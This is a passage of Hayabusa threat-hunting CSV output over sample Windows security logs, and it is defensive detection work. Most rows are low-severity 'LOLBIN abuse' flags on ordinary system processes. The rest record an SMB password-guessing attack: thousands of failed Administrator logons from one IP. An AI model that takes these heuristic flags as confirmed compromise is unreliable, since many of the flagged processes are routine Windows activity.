0xe94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:13:40.505 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:14:08.521 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:14:09.193 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:15:06.588 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:15:06.635 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:21:37.109 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:21:40.687 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:11.578 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:16.078 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:16.078 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:22.874 +00:00,IE10Win7,4688,low,Disc,Suspicious Tasklist Discovery Command,,rules/sigma/process_creation_builtin/proc_creation_win_susp_tasklist_command.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:26:42.937 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:45:37.636 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 15:45:37.699 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:02:55.011 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:34:02.839 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:34:02.839 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:35:52.272 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:35:52.319 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:36:17.350 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 16:50:06.477 
+00:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | Computer: 6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.513 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.513 +00:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW_PW-Guessing_Count.yml,- +2016-09-19 16:50:06.588 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.725 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.909 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:06.977 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:07.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.091 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.169 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.262 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.343 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.393 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.444 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.551 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.590 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.631 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.663 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.835 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:07.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.042 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.179 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.219 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.335 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 
Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.513 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.545 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.611 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.646 +00:00,DESKTOP-M5SN04R,4625,low,,Logon 
Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.735 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.769 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.839 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.883 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.916 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.955 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:08.992 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:09.028 